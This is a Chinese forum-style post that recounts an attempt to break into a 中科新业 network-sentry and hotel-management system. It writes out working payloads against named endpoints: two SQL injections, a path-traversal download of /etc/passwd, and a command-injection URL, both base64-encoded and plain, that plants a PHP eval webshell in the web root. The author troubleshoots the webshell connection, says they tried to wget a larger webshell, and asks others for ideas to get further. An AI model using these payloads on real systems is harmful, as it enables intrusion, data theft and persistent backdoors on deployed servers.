一次不完全成功的渗透

连续出差估计要半个月，虽然还是 在北京。但是还是烦着挤地铁。。

然后同事偷偷告诉我，可以打车，多少钱公司都给报销。

嗯，喜欢这种有钱对员工任性的公司。

终于回来了，写地点东西。。。

入驻某单位，涉密的事情不多提了，怕进去。想起在吐司发的一个贴被踩就不开心，虽然以前不怎么混吐司...

但是吐司不少人都是挺好的，也就决定发几个帖子。ziwen人不错，这篇文章其实是在吐司首发的，没什么技术含量，更多的是讨论。

-----------无敌分割线------------------

写poc累了，想尝试将一些漏洞复现试试。

发现一个酒店管理系统，中科新业什么鬼的。。。 中科新业网络哨兵多处漏洞 第一处：sql注入两发 ucenter/include/changauthprioritystatus.php?par=if(ascii(substr((select user()),1,1))=114,1,sleep(0.3)) ucenter/admin/addmacwhitelist.php?gUpd=E&id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b716b71,user(),0x7162767171)-- 第二处：文件下载 ucenter/admin/export.php?kind=log&gNetGuardLogFilePath=&filename=../../../../../../../../etc/passwd 第三处：命令执行 /ucenter/admin/export.php?gCommand=zero_tools&cmd=IiAmIGVjaG8gJzw/cGhwIGV2YWwoJF9QT1NUWyd2YWYnXSk7Pz4nID4gL3Vzci9sb2NhbC9NdWx0aUNlbnRlci9hcGFjaGUvaHRkb2NzL3VjZW50ZXIvYWRtaW4vZmYucGhwICYi 首先，上面三发漏洞的利用顺序：命令执行>sql注入>文件下载 如果看过源码的朋友应该知道，命令执行传递命令是要base64 解码的。 ucenter/admin/export.php?gCommand=zero_tools&cmd=" & echo '<?php eval($_POST['vaf']);?>' > /usr/local/MultiCenter/apache/htdocs/ucenter/admin/vaf.php &" 之前利用的时候碰到了一个坑，发现用echo命令的一个小细节。 这是在windows下

linux下：

如果写的时候用单引号，那么$符不需要转义。

如果写的时候用双引号，那么就要转义，我也不知道为什么。 /ucenter/admin/export.php?gCommand=zero_tools&cmd="&echo”<?php eval($_POST['vaf']);?>” > /usr/local/MultiCenter/apache/htdocs/ucenter/admin/vaf.php 写进去一直连不上菜刀。我在想为什么。 后面决定用下载漏洞下载自己写进去的这个文件看看是哪里出问题了。 ucenter/admin/export.php?kind=log&gNetGuardLogFilePath=&filename=../../../../../../../../usr/local/MultiCenter/apache/htdocs/ucenter/admin/vaf.php

换成单引号就ok了： /ucenter/admin/export.php?gCommand=zero_tools&cmd="&echo’<?php eval($_POST['vaf']);?>’ > /usr/local/MultiCenter/apache/htdocs/ucenter/admin/vaf.php 但是…如下：

写进来没问题的。

发现有单引号的执行失败….

用命令执行写大马失败，转移利用sql注入。获取后台，没有利用和上传点。

又转战用命令执行漏洞wget 大马，依旧失败。不搞了，公司的饭来了。 不搞了，公司的饭来了。 有大神有思路求点拨~~~